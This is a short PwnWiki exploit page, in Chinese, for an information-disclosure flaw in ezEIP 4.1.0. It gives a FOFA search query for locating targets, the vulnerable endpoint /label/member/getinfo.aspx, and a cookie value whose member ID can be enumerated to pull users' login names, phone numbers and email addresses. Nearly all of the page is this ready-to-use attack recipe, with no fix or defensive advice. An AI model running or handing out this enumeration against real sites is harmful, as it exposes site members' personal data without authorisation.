EzEIP 4.1.0 信息洩露漏洞

From PwnWiki

FOFA

"ezEIP"

漏洞利用

漏洞Url為: 

/label/member/getinfo.aspx

訪問時添加Cookie(通過遍歷獲取用戶的登錄名電話郵箱等信息): 

WHIR_USERINFOR=whir_mem_member_pid=1;

參考

https://short.pwnwiki.org/?c=NqyKZe

Retrieved from "https://pwnwiki.com/index.php?title=EzEIP_4.1.0_信息洩露漏洞&oldid=2743"